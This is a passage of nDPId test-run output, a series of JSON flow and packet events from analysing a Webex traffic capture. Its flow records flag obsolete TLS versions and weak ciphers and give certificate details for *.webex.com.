+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1444570636268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoAZtAABAGpYVARHljCggAAQG72qGkCFzlW\/ejG1AS\/\/8PxQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1444570636268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoNIhAAEAGU28KCAABQERojK3MAbt5hvZ3hnkJilAQOQgUagAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636248,"flow_last_seen":1444570636268,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636268,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo0S1AAEAGIvEKCAABch3Ki7gMAbtSShPerbXsI1AQOQh2UQAA"} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636252,"flow_last_seen":1444570636269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo70NAAEAGj0QKCAABrfMETM36AbsKei209YXSTVAQOQjqzAAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636255,"flow_last_seen":1444570636270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1444570636270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAAou9dAAEAGu0cKCAABQER5ZMv7AbtwVXklj6qG3FAQOQjlYgAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636270,"flow_last_seen":1444570636270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1444570636270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAA879dAAEAGBrMKCAABch3IC7rhAbtuYS0jAAAAAKACOQivZQAAAgQFtAQCCAoATML0AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1444570636273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636273,"pkt":"ABoRAAACABoRAAABCABFAAAoAZ9AABAGJQByHcgLCggAAQG7uuGRntLcbmEtJFAS\/\/+vAwAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636259,"flow_last_seen":1444570636273,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636273,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1444570636274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636274,"pkt":"ABoRAAACABoRAAABCABFAAAoYepAAEAGFTYKCAABQER5Y9qhAbtb96MbpAhc5lAQOQjWvQAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636264,"flow_last_seen":1444570636274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636274,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1444570636275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636275,"pkt":"ABoRAAACABoRAAABCABFAAAo79hAAEAGBsYKCAABch3IC7rhAbtuYS0kkZ7S3VAQOQh1\/AAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636270,"flow_last_seen":1444570636276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636276,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636359,"flow_last_seen":1444570636359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636359,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1444570636359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636359,"pkt":"ABoRAAACABoRAAABCABFAAA86IFAAEAGnowKCAABQERpYciqAbsEZyp7AAAAAKACOQievAAAAgQFtAQCCAoATML6AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1444570636363,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636363,"pkt":"ABoRAAACABoRAAABCABFAAAoAaNAABAGtX9ARGlhCggAAQG7yKr7mNWEBGcqfFAS\/\/8xvgAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636364,"flow_last_seen":1444570636364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636364,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1444570636364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636364,"pkt":"ABoRAAACABoRAAABCABFAAA8Y+FAAEAGIywKCAABQERpYpEJAbvtraEaAAAAAKACOQh2dQAAAgQFtAQCCAoATML7AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1444570636368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAoAaRAABAGtX1ARGliCggAAQG7kQkSUl7l7a2hG1AS\/\/9pXgAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1444570636368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAo6IJAAEAGnp8KCAABQERpYciqAbsEZyp8+5jVhVAQOQj4tgAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636359,"flow_last_seen":1444570636368,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636368,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1444570636369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636369,"pkt":"ABoRAAACABoRAAABCABFAAAoY+JAAEAGIz8KCAABQERpYpEJAbvtraEbElJe5lAQOQgwVwAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636364,"flow_last_seen":1444570636369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636369,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636387,"flow_last_seen":1444570636387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636387,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1444570636387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636387,"pkt":"ABoRAAACABoRAAABCABFAAA82lhAAEAGrK8KCAABQERpZ6GqAbsG3RlZAAAAAKACOQjUWwAAAgQFtAQCCAoATMMBAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1444570636395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAoAadAABAGtXVARGlnCggAAQG7oar5IuamBt0ZWlAS\/\/9YuAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1444570636395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAo2llAAEAGrMIKCAABQERpZ6GqAbsG3Rla+SLmp1AQOQgfsQAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636387,"flow_last_seen":1444570636397,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636397,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":328,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636180,"flow_last_seen":1444570636471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636471,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":335,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636160,"flow_last_seen":1444570636701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636701,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636248,"flow_last_seen":1444570636703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636703,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":341,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636255,"flow_last_seen":1444570636706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":347,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636170,"flow_last_seen":1444570636773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636773,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 